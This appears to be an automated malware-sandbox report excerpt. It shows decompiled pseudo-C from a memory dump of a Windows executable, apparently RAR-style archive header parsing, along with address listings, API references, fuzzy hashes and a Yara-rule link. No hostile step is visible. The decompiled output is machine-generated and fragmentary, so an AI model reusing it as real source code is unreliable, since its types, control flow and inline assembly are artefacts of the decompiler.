												L132:
												 *((intOrPtr*)(_t698 + 0x1c)) =  *((intOrPtr*)(_t698 + 0x3c));
												goto L133;
											}
											_t368 =  *(_t518 + 0x21e8);
											__eflags = _t368 - 0x79;
											if(_t368 == 0x79) {
												goto L132;
											}
											__eflags = _t368 - 0x76;
											if(_t368 == 0x76) {
												goto L132;
											}
											__eflags = _t368 - 5;
											if(_t368 != 5) {
												L130:
												 *((char*)(_t518 + 0x6cc4)) = 1;
												E00266E03(0x2a00e0, 3);
												__eflags =  *((char*)(_t698 + 0x5f));
												if(__eflags == 0) {
													goto L132;
												}
												E00266BF5(__eflags, 4, _t518 + 0x1e, _t518 + 0x1e);
												 *((char*)(_t518 + 0x6cc5)) = 1;
												goto L133;
											}
											__eflags =  *(_t518 + 0x45ae);
											if( *(_t518 + 0x45ae) == 0) {
												goto L130;
											}
											_t374 =  *((intOrPtr*)( *_t518 + 0x14))() - _t655;
											__eflags = _t374;
											asm("sbb edx, ecx");
											 *((intOrPtr*)( *_t518 + 0x10))(_t374, _t638, 0);
											 *(_t698 + 0x5e) = 1;
											do {
												_t376 = E0026972B(_t518);
												asm("sbb al, al");
												_t379 =  !( ~_t376) &  *(_t698 + 0x5e);
												 *(_t698 + 0x5e) = _t379;
												_t655 = _t655 - 1;
												__eflags = _t655;
											} while (_t655 != 0);
											__eflags = _t379;
											if(_t379 != 0) {
												goto L132;
											}
											goto L130;
										}
										_t356 = 0;
										__eflags =  *(_t518 + 0x221c);
										if( *(_t518 + 0x221c) == 0) {
											goto L120;
										}
										goto L119;
									}
									if(__eflags <= 0) {
										L115:
										__eflags =  *(_t518 + 0x21ec) & 0x00008000;
										if(( *(_t518 + 0x21ec) & 0x00008000) != 0) {
											 *((intOrPtr*)(_t518 + 0x6ca8)) =  *((intOrPtr*)(_t518 + 0x6ca8)) + E0026C29E(_t698 + 0x24);
											asm("adc dword [ebx+0x6cac], 0x0");
										}
										goto L122;
									}
									__eflags = _t536 - 3;
									if(_t536 <= 3) {
										__eflags = _t536 - 2;
										_t64 = (0 | _t536 != 0x00000002) - 1; // -1
										_t663 = (_t64 & 0xffffdcb0) + 0x45d0 + _t518;
										 *(_t698 + 0x48) = _t663;
										E0026A8D2(_t663, 0);
										_t560 = 5;
										memcpy(_t663, _t518 + 0x21e4, _t560 << 2);
										_t685 =  *(_t698 + 0x48);
										_t666 =  *(_t698 + 0x50);
										_t562 =  *(_t685 + 8);
										 *(_t685 + 0x1098) =  *(_t685 + 8) & 1;
										 *(_t685 + 0x1099) = _t562 >> 0x00000001 & 1;
										 *(_t685 + 0x109b) = _t562 >> 0x00000002 & 1;
										 *(_t685 + 0x10a0) = _t562 >> 0x0000000a & 1;
										__eflags = _t666 - 2;
										if(_t666 != 2) {
											L35:
											_t641 = 0;
											__eflags = 0;
											_t396 = 0;
											L36:
											 *((char*)(_t685 + 0x10f0)) = _t396;
											__eflags = _t666 - 2;
											if(_t666 == 2) {
												L39:
												_t397 = _t641;
												L40:
												 *(_t685 + 0x10fa) = _t397;
												_t563 = _t562 & 0x000000e0;
												__eflags = _t563 - 0xe0;
												 *((char*)(_t685 + 0x10f1)) = 0 | _t563 == 0x000000e0;
												__eflags = _t563 - 0xe0;
												if(_t563 != 0xe0) {
													_t642 =  *(_t685 + 8);
													_t401 = 0x10000 << (_t642 >> 0x00000005 & 0x00000007);
													__eflags = 0x10000;
												} else {
													_t401 = _t641;
													_t642 =  *(_t685 + 8);
												}
												 *(_t685 + 0x10f4) = _t401;
												 *(_t685 + 0x10f3) = _t642 >> 0x0000000b & 0x00000001;
												 *(_t685 + 0x10f2) = _t642 >> 0x00000003 & 0x00000001;
												 *((intOrPtr*)(_t685 + 0x14)) = E0026C29E(_t698 + 0x24);
												 *(_t698 + 0x54) = E0026C29E(_t698 + 0x24);
												 *((char*)(_t685 + 0x18)) = E0026C251(_t698 + 0x24);
												 *(_t685 + 0x1070) = 2;
												 *((intOrPtr*)(_t685 + 0x1074)) = E0026C29E(_t698 + 0x24);
												 *(_t698 + 0x18) = E0026C29E(_t698 + 0x24);
												 *(_t685 + 0x1c) = E0026C251(_t698 + 0x24) & 0x000000ff;
												 *((char*)(_t685 + 0x20)) = E0026C251(_t698 + 0x24) - 0x30;
												 *(_t698 + 0x4c) = E0026C269(_t698 + 0x24) & 0x0000ffff;
												_t415 = E0026C29E(_t698 + 0x24);
												_t645 =  *(_t685 + 0x1c);
												 *(_t698 + 0x58) = _t415;
												 *(_t685 + 0x24) = _t415;
												__eflags = _t645 - 0x14;
												if(_t645 < 0x14) {
													__eflags = _t415 & 0x00000010;
													if((_t415 & 0x00000010) != 0) {
														 *((char*)(_t685 + 0x10f1)) = 1;
													}
												}
												 *(_t685 + 0x109c) = 0;
												__eflags =  *(_t685 + 0x109b);
												if( *(_t685 + 0x109b) == 0) {
													L55:
													_t416 =  *((intOrPtr*)(_t685 + 0x18));
													 *(_t685 + 0x10fc) = 2;
													__eflags = _t416 - 3;
													if(_t416 == 3) {
														L59:
														 *(_t685 + 0x10fc) = 1;
														L60:
														 *(_t685 + 0x1100) = 0;
														__eflags = _t416 - 3;
														if(_t416 == 3) {
															__eflags = ( *(_t698 + 0x58) & 0x0000f000) - 0xa000;
															if(( *(_t698 + 0x58) & 0x0000f000) == 0xa000) {
																__eflags = 0;
																 *(_t685 + 0x1100) = 1;
																 *((short*)(_t685 + 0x1104)) = 0;
															}
														}
														__eflags = _t666 - 2;
														if(_t666 == 2) {
															L66:
															_t417 = 0;
															goto L67;
														} else {
															__eflags =  *(_t685 + 0x24);
															if( *(_t685 + 0x24) >= 0) {
																goto L66;
															}
															_t417 = 1;
															L67:
															 *((char*)(_t685 + 0x10f8)) = _t417;
															_t420 =  *(_t685 + 8) >> 0x00000008 & 0x00000001;
															__eflags = _t420;
															 *(_t685 + 0x10f9) = _t420;
															if(_t420 == 0) {
																__eflags =  *(_t698 + 0x54) - 0xffffffff;
																_t638 = 0;
																_t667 = 0;
																_t137 =  *(_t698 + 0x54) == 0xffffffff;
																__eflags = _t137;
																_t421 = _t420 & 0xffffff00 | _t137;
																L73:
																 *(_t685 + 0x109a) = _t421;
																 *((intOrPtr*)(_t685 + 0x1058)) = 0 +  *((intOrPtr*)(_t685 + 0x14));
																asm("adc edi, ecx");
																 *((intOrPtr*)(_t685 + 0x105c)) = _t667;
																asm("adc edx, ecx");
																 *(_t685 + 0x1060) = 0 +  *(_t698 + 0x54);
																__eflags =  *(_t685 + 0x109a);
																 *(_t685 + 0x1064) = _t638;
																if( *(_t685 + 0x109a) != 0) {
																	 *(_t685 + 0x1060) = 0x7fffffff;
																	 *(_t685 + 0x1064) = 0x7fffffff;
																}
																_t426 =  *(_t698 + 0x4c);
																_t668 = 0x1fff;
																 *(_t698 + 0x54) = 0x1fff;
																__eflags = _t426 - 0x1fff;
																if(_t426 < 0x1fff) {
																	_t668 = _t426;
																	 *(_t698 + 0x54) = _t426;
																}
																E0026C300(_t698 + 0x24, _t698 - 0x2030, _t668);
																_t429 = 0;
																__eflags =  *(_t698 + 0x50) - 2;
																 *((char*)(_t698 + _t668 - 0x2030)) = 0;
																if( *(_t698 + 0x50) != 2) {
																	 *(_t698 + 0x50) = _t685 + 0x28;
																	_t432 = E00270FDE(_t698 - 0x2030, _t685 + 0x28, 0x800);
																	_t671 =  *((intOrPtr*)(_t685 + 0xc)) -  *(_t698 + 0x4c) - 0x20;
																	__eflags =  *(_t685 + 8) & 0x00000400;
																	if(( *(_t685 + 8) & 0x00000400) != 0) {
																		_t671 = _t671 - 8;
																		__eflags = _t671;
																	}
																	__eflags = _t671;
																	if(_t671 <= 0) {
																		_t672 = _t685 + 0x28;
																	} else {
																		 *(_t698 + 0x58) = _t685 + 0x1028;
																		E00261EDE(_t685 + 0x1028, _t671);
																		_t466 = E0026C300(_t698 + 0x24,  *(_t685 + 0x1028), _t671);
																		_t672 = _t685 + 0x28;
																		_t432 = E00282B69(_t466, _t685 + 0x28, L"RR");
																		__eflags = _t432;
																		if(_t432 == 0) {
																			__eflags =  *((intOrPtr*)(_t685 + 0x102c)) - 0x14;
																			if( *((intOrPtr*)(_t685 + 0x102c)) >= 0x14) {
																				_t673 =  *( *(_t698 + 0x58));
																				asm("cdq");
																				_t602 =  *(_t673 + 0xb) & 0x000000ff;
																				asm("cdq");
																				_t604 = (_t602 << 8) + ( *(_t673 + 0xa) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t606 = (_t604 << 8) + ( *(_t673 + 9) & 0x000000ff);
																				asm("adc esi, edx");
																				asm("cdq");
																				_t472 = (_t606 << 8) + ( *(_t673 + 8) & 0x000000ff);
																				asm("adc esi, edx");
																				 *(_t518 + 0x21c0) = _t472 << 9;
																				 *(_t518 + 0x21c4) = ((((_t638 << 0x00000020 | _t602) << 0x8 << 0x00000020 | _t604) << 0x8 << 0x00000020 | _t606) << 0x8 << 0x00000020 | _t472) << 9;
																				_t476 = E0026F749( *(_t518 + 0x21c0),  *(_t518 + 0x21c4),  *((intOrPtr*)( *_t518 + 0x14))(), _t638);
																				 *(_t518 + 0x21c8) = _t476;
																				 *(_t698 + 0x58) = _t476;
																				_t477 = E0027D890(_t475, _t638, 0xc8, 0);
																				asm("adc edx, [ebx+0x21c4]");
																				_t432 = E0026F749(_t477 +  *(_t518 + 0x21c0), _t638, _t475, _t638);
																				_t612 =  *(_t698 + 0x58);
																				_t685 =  *(_t698 + 0x48);
																				_t672 =  *(_t698 + 0x50);
																				__eflags = _t432 - _t612;
																				if(_t432 > _t612) {
																					_t432 = _t612 + 1;
																					 *(_t518 + 0x21c8) = _t612 + 1;
																				}
																			}
																		}
																	}
																	_t433 = E00282B69(_t432, _t672, L"CMT");
																	__eflags = _t433;
																	if(_t433 == 0) {
																		 *((char*)(_t518 + 0x6cb6)) = 1;
																	}
																} else {
																	_t672 = _t685 + 0x28;
																	 *_t672 = 0;
																	__eflags =  *(_t685 + 8) & 0x00000200;
																	if(( *(_t685 + 8) & 0x00000200) != 0) {
																		E002669E0(_t698);
																		_t484 = E00282BB0(_t698 - 0x2030);
																		_t638 =  *(_t698 + 0x54);
																		_t485 = _t484 + 1;
																		__eflags = _t638 - _t485;
																		if(_t638 > _t485) {
																			__eflags = _t485 + _t698 - 0x2030;
																			E002669F1(_t698, _t698 - 0x2030, _t638, _t485 + _t698 - 0x2030, _t638 - _t485, _t672, 0x800);
																		}
																		_t429 = 0;
																		__eflags = 0;
																	}
																	__eflags =  *_t672 - _t429;
																	if( *_t672 == _t429) {
																		_push(1);
																		_push(0x800);
																		_push(_t672);
																		_push(_t698 - 0x2030);
																		E0026F79F();
																	}
																	E00261F3D(_t518, _t685);
																}
																__eflags =  *(_t685 + 8) & 0x00000400;
																if(( *(_t685 + 8) & 0x00000400) != 0) {
																	E0026C300(_t698 + 0x24, _t685 + 0x10a1, 8);
																}
																E002708B2( *(_t698 + 0x18));
																__eflags =  *(_t685 + 8) & 0x00001000;
																if(( *(_t685 + 8) & 0x00001000) == 0) {
																	L112:
																	 *((intOrPtr*)(_t518 + 0x6ca8)) = E00263CA7( *((intOrPtr*)(_t518 + 0x6ca8)),  *(_t518 + 0x6cac),  *((intOrPtr*)(_t685 + 0x1058)),  *((intOrPtr*)(_t685 + 0x105c)), 0, 0);
																	 *(_t518 + 0x6cac) = _t638;
																	 *((char*)(_t698 + 0x20)) =  *(_t685 + 0x10f2);
																	_t438 = E0026C34F(_t698 + 0x24,  *((intOrPtr*)(_t698 + 0x20)));
																	__eflags =  *_t685 - (_t438 & 0x0000ffff);
																	if( *_t685 != (_t438 & 0x0000ffff)) {
																		 *((char*)(_t518 + 0x6cc4)) = 1;
																		E00266E03(0x2a00e0, 1);
																		__eflags =  *((char*)(_t698 + 0x5f));
																		if(__eflags == 0) {
																			E00266BF5(__eflags, 0x1c, _t518 + 0x1e, _t672);
																		}
																	}
																	goto L121;
																} else {
																	_t443 = E0026C269(_t698 + 0x24);
																	 *((intOrPtr*)(_t698 + 4)) = _t518 + 0x32c0;
																	 *((intOrPtr*)(_t698 + 8)) = _t518 + 0x32c8;
																	 *((intOrPtr*)(_t698 + 0xc)) = _t518 + 0x32d0;
																	__eflags = 0;
																	_t686 = 0;
																	 *((intOrPtr*)(_t698 + 0x10)) = 0;
																	_t448 = _t443 & 0x0000ffff;
																	 *(_t698 + 0x4c) = 0;
																	 *(_t698 + 0x58) = _t448;
																	do {
																		_t586 = 3;
																		_t521 = _t448 >> _t586 - _t686 << 2;
																		__eflags = _t521 & 0x00000008;
																		if((_t521 & 0x00000008) == 0) {
																			goto L110;
																		}
																		__eflags =  *(_t698 + 4 + _t686 * 4);
																		if( *(_t698 + 4 + _t686 * 4) == 0) {
																			goto L110;
																		}
																		__eflags = _t686;
																		if(__eflags != 0) {
																			E002708B2(E0026C29E(_t698 + 0x24));
																		}
																		E002706E0( *(_t698 + 4 + _t686 * 4), _t638, __eflags, _t698 - 0x30);
																		__eflags = _t521 & 0x00000004;
																		if((_t521 & 0x00000004) != 0) {
																			_t249 = _t698 - 0x1c;
																			 *_t249 =  *(_t698 - 0x1c) + 1;
																			__eflags =  *_t249;
																		}
																		_t590 = 0;
																		 *(_t698 - 0x18) = 0;
																		_t522 = _t521 & 0x00000003;
																		__eflags = _t522;
																		if(_t522 <= 0) {
																			L109:
																			_t451 = _t590 * 0x64;
																			__eflags = _t451;
																			 *(_t698 - 0x18) = _t451;
																			E00270910( *(_t698 + 4 + _t686 * 4), _t638, _t698 - 0x30);
																			_t448 =  *(_t698 + 0x58);
																		} else {
																			_t454 = 3;
																			_t456 = _t454 - _t522 << 3;
																			__eflags = _t456;
																			 *(_t698 + 0x18) = _t456;
																			_t687 = _t456;
																			do {
																				_t459 = (E0026C251(_t698 + 0x24) & 0x000000ff) << _t687;
																				_t687 = _t687 + 8;
																				_t590 =  *(_t698 - 0x18) | _t459;
																				 *(_t698 - 0x18) = _t590;
																				_t522 = _t522 - 1;
																				__eflags = _t522;
																			} while (_t522 != 0);
																			_t686 =  *(_t698 + 0x4c);
																			goto L109;
																		}
																		L110:
																		_t686 = _t686 + 1;
																		 *(_t698 + 0x4c) = _t686;
																		__eflags = _t686 - 4;
																	} while (_t686 < 4);
																	_t518 =  *((intOrPtr*)(_t698 + 0x20));
																	_t685 =  *(_t698 + 0x48);
																	goto L112;
																}
															}
															_t667 = E0026C29E(_t698 + 0x24);
															_t491 = E0026C29E(_t698 + 0x24);
															__eflags =  *(_t698 + 0x54) - 0xffffffff;
															_t638 = _t491;
															if( *(_t698 + 0x54) != 0xffffffff) {
																L71:
																_t421 = 0;
																goto L73;
															}
															__eflags = _t638 - 0xffffffff;
															if(_t638 != 0xffffffff) {
																goto L71;
															}
															_t421 = 1;
															goto L73;
														}
													}
													__eflags = _t416 - 5;
													if(_t416 == 5) {
														goto L59;
													}
													__eflags = _t416 - 6;
													if(_t416 < 6) {
														 *(_t685 + 0x10fc) = 0;
													}
													goto L60;
												} else {
													_t646 = _t645 - 0xd;
													__eflags = _t646;
													if(_t646 == 0) {
														 *(_t685 + 0x109c) = 1;
														goto L55;
													}
													_t648 = _t646;
													__eflags = _t648;
													if(_t648 == 0) {
														 *(_t685 + 0x109c) = 2;
														goto L55;
													}
													_t649 = _t648 - 5;
													__eflags = _t649;
													if(_t649 == 0) {
														L52:
														 *(_t685 + 0x109c) = 3;
														goto L55;
													}
													__eflags = _t649 == 6;
													if(_t649 == 6) {
														goto L52;
													}
													 *(_t685 + 0x109c) = 4;
													goto L55;
												}
											}
											__eflags = _t562 & 0x00000010;
											if((_t562 & 0x00000010) == 0) {
												goto L39;
											}
											_t397 = 1;
											goto L40;
										}
										__eflags = _t562 & 0x00000010;
										if((_t562 & 0x00000010) == 0) {
											goto L35;
										} else {
											_t396 = 1;
											_t641 = 0;
											goto L36;
										}
									}
									__eflags = _t536 - 5;
									if(_t536 != 5) {
										goto L115;
									} else {
										memcpy(_t518 + 0x4590, _t518 + 0x21e4, _t536 << 2);
										_t651 =  *(_t518 + 0x4598);
										 *(_t518 + 0x45ac) =  *(_t518 + 0x4598) & 0x00000001;
										_t628 = _t651 >> 0x00000001 & 0x00000001;
										_t638 = _t651 >> 0x00000003 & 0x00000001;
										 *(_t518 + 0x45ad) = _t628;
										 *(_t518 + 0x45ae) = _t651 >> 0x00000002 & 0x00000001;
										 *(_t518 + 0x45af) = _t638;
										__eflags = _t628;
										if(_t628 != 0) {
											 *((intOrPtr*)(_t518 + 0x45a4)) = E0026C29E(_t698 + 0x24);
										}
										__eflags =  *(_t518 + 0x45af);
										if( *(_t518 + 0x45af) != 0) {
											_t505 = E0026C269(_t698 + 0x24) & 0x0000ffff;
											 *(_t518 + 0x45a8) = _t505;
											 *(_t518 + 0x6cd8) = _t505;
										}
										goto L121;
									}
								}
								__eflags =  *(_t518 + 0x21ec) & 0x00000002;
								if(( *(_t518 + 0x21ec) & 0x00000002) != 0) {
									goto L20;
								}
								goto L23;
							}
							L20:
							_push(6);
							goto L24;
						} else {
							E00261EF8(_t518);
							L133:
							E0026159C(_t698 + 0x24);
							 *[fs:0x0] =  *((intOrPtr*)(_t698 - 0xc));
							return  *((intOrPtr*)(_t698 + 0x1c));
						}
					}
					L8:
					E00263DAB(_t518, _t638);
					goto L133;
				}
				_t638 =  *((intOrPtr*)(_t518 + 0x6cc0)) + _t655;
				asm("adc eax, ecx");
				_t707 =  *(_t518 + 0x6ca4);
				if(_t707 < 0 || _t707 <= 0 &&  *((intOrPtr*)(_t518 + 0x6ca0)) <= _t638) {
					goto L6;
				} else {
					 *((char*)(_t698 + 0x5f)) = 1;
					E00263C40(_t518);
					_push(8);
					_push(_t698 + 0x14);
					if( *((intOrPtr*)( *_t518 + 0xc))() != 8) {
						goto L8;
					} else {
						_t697 = _t518 + 0x1024;
						E0026607D(_t697, 0, 4,  *((intOrPtr*)(_t518 + 0x21bc)) + 0x5024, _t698 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t698 + 0x44)) = _t697;
						goto L7;
					}
				}
			}

0x00262692
0x0026269b
0x002626a5
0x002626ac
0x002626b3
0x002626b6
0x002626bf
0x002626c2
0x002626c5
0x002626cc
0x00262734
0x00262734
0x00262737
0x0026273b
0x00262744
0x00262760
0x00262766
0x00262775
0x0026277d
0x00262783
0x0026278e
0x00262799
0x0026279c
0x002627a2
0x002627a8
0x002627aa
0x002627b8
0x002627b8
0x002627bb
0x002627f0
0x002627bd
0x002627bd
0x002627bd
0x002627c0
0x002627e4
0x002627c2
0x002627c2
0x002627c2
0x002627c5
0x002627d8
0x002627c7
0x002627c7
0x002627ca
0x002627cc
0x002627cc
0x002627ca
0x002627c5
0x002627c0
0x002627fa
0x00262800
0x00262806
0x00262809
0x0026280f
0x00262812
0x0026281d
0x00262820
0x00262821
0x00262824
0x00262844
0x0026284a
0x00262850
0x00262853
0x00262859
0x0026285c
0x0026285f
0x00262f78
0x00262f80
0x00262f87
0x00262f8e
0x00262f9b
0x00262fad
0x00262fb2
0x00262fb8
0x00262fca
0x00262fd0
0x00262fdd
0x00262fea
0x00262ff7
0x00262ffd
0x00262fff
0x0026300c
0x0026300e
0x0026300e
0x0026300f
0x0026300f
0x0026301b
0x0026302b
0x0026302b
0x0026302e
0x00263034
0x0026303a
0x0026303c
0x0026303d
0x00263042
0x0026304a
0x00263050
0x002630d9
0x002630dc
0x00000000
0x002630dc
0x00263056
0x0026305c
0x0026305f
0x00000000
0x00000000
0x00263061
0x00263064
0x00000000
0x00000000
0x00263066
0x00263069
0x002630ab
0x002630b2
0x002630b9
0x002630be
0x002630c2
0x00000000
0x00000000
0x002630cb
0x002630d0
0x00000000
0x002630d0
0x0026306b
0x00263072
0x00000000
0x00000000
0x0026307f
0x0026307f
0x00263082
0x00263088
0x0026308b
0x0026308f
0x00263091
0x00263098
0x0026309c
0x0026309f
0x002630a2
0x002630a2
0x002630a2
0x002630a7
0x002630a9
0x00000000
0x00000000
0x00000000
0x002630a9
0x00263001
0x00263003
0x0026300a
0x00000000
0x00000000
0x00000000
0x0026300a
0x00262865
0x00262f4e
0x00262f4e
0x00262f58
0x00262f66
0x00262f6c
0x00262f6c
0x00000000
0x00262f58
0x0026286b
0x0026286e
0x00262902
0x0026290a
0x00262919
0x0026291d
0x00262920
0x00262927
0x00262930
0x00262932
0x00262936
0x0026293c
0x00262941
0x0026294d
0x0026295a
0x00262967
0x0026296d
0x00262970
0x0026297d
0x0026297d
0x0026297d
0x0026297f
0x00262981
0x00262981
0x00262987
0x0026298a
0x00262996
0x00262996
0x00262998
0x00262998
0x002629a3
0x002629a5
0x002629aa
0x002629b0
0x002629b6
0x002629bf
0x002629cf
0x002629cf
0x002629b8
0x002629b8
0x002629ba
0x002629ba
0x002629d1
0x002629e7
0x002629ed
0x002629fb
0x00262a06
0x00262a11
0x00262a14
0x00262a26
0x00262a34
0x00262a3f
0x00262a4f
0x00262a5d
0x00262a60
0x00262a65
0x00262a68
0x00262a6b
0x00262a6e
0x00262a71
0x00262a73
0x00262a75
0x00262a77
0x00262a77
0x00262a75
0x00262a80
0x00262a86
0x00262a8c
0x00262ad1
0x00262ad1
0x00262ad4
0x00262ade
0x00262ae0
0x00262af2
0x00262af2
0x00262afc
0x00262afc
0x00262b02
0x00262b04
0x00262b0e
0x00262b13
0x00262b15
0x00262b17
0x00262b21
0x00262b21
0x00262b13
0x00262b28
0x00262b2b
0x00262b37
0x00262b37
0x00000000
0x00262b2d
0x00262b2d
0x00262b30
0x00000000
0x00000000
0x00262b34
0x00262b39
0x00262b39
0x00262b45
0x00262b45
0x00262b47
0x00262b4d
0x00262b7b
0x00262b7f
0x00262b81
0x00262b83
0x00262b83
0x00262b83
0x00262b86
0x00262b86
0x00262b91
0x00262b97
0x00262b9e
0x00262ba4
0x00262ba6
0x00262bac
0x00262bb3
0x00262bb9
0x00262bc0
0x00262bc6
0x00262bc6
0x00262bcc
0x00262bcf
0x00262bd4
0x00262bd7
0x00262bd9
0x00262bdb
0x00262bdd
0x00262bdd
0x00262beb
0x00262bf0
0x00262bf2
0x00262bf6
0x00262bfd
0x00262c7e
0x00262c88
0x00262c93
0x00262c96
0x00262c9d
0x00262c9f
0x00262c9f
0x00262c9f
0x00262ca2
0x00262ca4
0x00262da6
0x00262caa
0x00262cb3
0x00262cb6
0x00262cc5
0x00262ccf
0x00262cd3
0x00262cda
0x00262cdc
0x00262ce2
0x00262ce9
0x00262cf2
0x00262cf8
0x00262cf9
0x00262d05
0x00262d09
0x00262d0f
0x00262d11
0x00262d19
0x00262d1f
0x00262d21
0x00262d2b
0x00262d2d
0x00262d38
0x00262d40
0x00262d5d
0x00262d6d
0x00262d73
0x00262d76
0x00262d81
0x00262d89
0x00262d8e
0x00262d91
0x00262d94
0x00262d97
0x00262d99
0x00262d9b
0x00262d9e
0x00262d9e
0x00262d99
0x00262ce9
0x00262cdc
0x00262daf
0x00262db6
0x00262db8
0x00262dba
0x00262dba
0x00262bff
0x00262c01
0x00262c04
0x00262c07
0x00262c0e
0x00262c13
0x00262c1f
0x00262c24
0x00262c27
0x00262c29
0x00262c2b
0x00262c3e
0x00262c48
0x00262c48
0x00262c4d
0x00262c4d
0x00262c4d
0x00262c4f
0x00262c52
0x00262c54
0x00262c56
0x00262c5b
0x00262c62
0x00262c63
0x00262c63
0x00262c6b
0x00262c6b
0x00262dc1
0x00262dc8
0x00262dd6
0x00262dd6
0x00262de4
0x00262de9
0x00262df0
0x00262ed4
0x00262ef5
0x00262efe
0x00262f0a
0x00262f10
0x00262f18
0x00262f1a
0x00262f27
0x00262f2e
0x00262f33
0x00262f37
0x00262f44
0x00262f44
0x00262f37
0x00000000
0x00262df6
0x00262df9
0x00262e07
0x00262e10
0x00262e19
0x00262e1c
0x00262e1e
0x00262e20
0x00262e23
0x00262e25
0x00262e28
0x00262e2b
0x00262e2d
0x00262e35
0x00262e37
0x00262e3a
0x00000000
0x00000000
0x00262e40
0x00262e45
0x00000000
0x00000000
0x00262e47
0x00262e49
0x00262e58
0x00262e58
0x00262e65
0x00262e6a
0x00262e6d
0x00262e6f
0x00262e6f
0x00262e6f
0x00262e6f
0x00262e72
0x00262e74
0x00262e77
0x00262e77
0x00262e7a
0x00262eab
0x00262eab
0x00262eab
0x00262eb2
0x00262eb9
0x00262ebe
0x00262e7c
0x00262e7e
0x00262e81
0x00262e81
0x00262e84
0x00262e87
0x00262e89
0x00262e96
0x00262e98
0x00262e9e
0x00262ea0
0x00262ea3
0x00262ea3
0x00262ea3
0x00262ea8
0x00000000
0x00262ea8
0x00262ec1
0x00262ec1
0x00262ec2
0x00262ec5
0x00262ec5
0x00262ece
0x00262ed1
0x00000000
0x00262ed1
0x00262df0
0x00262b5a
0x00262b5c
0x00262b61
0x00262b65
0x00262b67
0x00262b75
0x00262b77
0x00000000
0x00262b77
0x00262b69
0x00262b6c
0x00000000
0x00000000
0x00262b70
0x00000000
0x00262b71
0x00262b2b
0x00262ae2
0x00262ae4
0x00000000
0x00000000
0x00262ae6
0x00262ae8
0x00262aea
0x00262aea
0x00000000
0x00262a8e
0x00262a8e
0x00262a8e
0x00262a91
0x00262ac7
0x00000000
0x00262ac7
0x00262a94
0x00262a94
0x00262a97
0x00262abb
0x00000000
0x00262abb
0x00262a99
0x00262a99
0x00262a9c
0x00262aaf
0x00262aaf
0x00000000
0x00262aaf
0x00262a9e
0x00262aa1
0x00000000
0x00000000
0x00262aa3
0x00000000
0x00262aa3
0x00262a8c
0x0026298c
0x0026298f
0x00000000
0x00000000
0x00262993
0x00000000
0x00262993
0x00262972
0x00262975
0x00000000
0x00262977
0x00262977
0x00262979
0x00000000
0x00262979
0x00262975
0x00262874
0x00262877
0x00000000
0x0026287d
0x00262889
0x00262891
0x00262899
0x002628a8
0x002628b0
0x002628b3
0x002628b9
0x002628bf
0x002628c5
0x002628c7
0x002628d1
0x002628d1
0x002628d7
0x002628de
0x002628ec
0x002628ef
0x002628f5
0x002628f5
0x00000000
0x002628de
0x00262877
0x00262814
0x0026281b
0x00000000
0x00000000
0x00000000
0x0026281b
0x0026280b
0x0026280b
0x00000000
0x002627ac
0x002627ae
0x002630df
0x002630e2
0x002630f0
0x002630fb
0x002630fb
0x002627aa
0x00262746
0x00262748
0x00000000
0x00262748
0x002626d6
0x002626d8
0x002626da
0x002626e0
0x00000000
0x002626ec
0x002626ee
0x002626f2
0x002626fc
0x002626fe
0x00262707
0x00000000
0x00262709
0x00262719
0x0026272a
0x0026272f
0x00000000
0x0026272f
0x00262707

APIs

__EH_prolog.LIBCMT ref: 0026269B
_strlen.LIBCMT ref: 00262C1F

Part of subcall function 00270FDE: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0026B312,00000000,?,?,?,0002032C), ref: 00270FFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00262D76

Strings

CMT, xrefs: 00262DA9

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 9b29114b7c3518f3fdd9b2a410d1f83ccfb7872df70375d1dc6d353f568f6ed2
Instruction ID: 2de00b1519341d093ba651fab2a2b9ac5261094f4834c0a640f972759a001096
Opcode Fuzzy Hash: 9b29114b7c3518f3fdd9b2a410d1f83ccfb7872df70375d1dc6d353f568f6ed2
Instruction Fuzzy Hash: DA620471620685CFDF18DF74C895AEA37E1EF54304F14457EEC8A8B282DB7199A8CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00287BE1, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00287BE1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x29d668; // 0xd26a0a57
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0027E690(_t41);
					_pop(_t61);
				}
				E0027E920(_t66,  &_v804, 0, 0x50);
				E0027E920(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
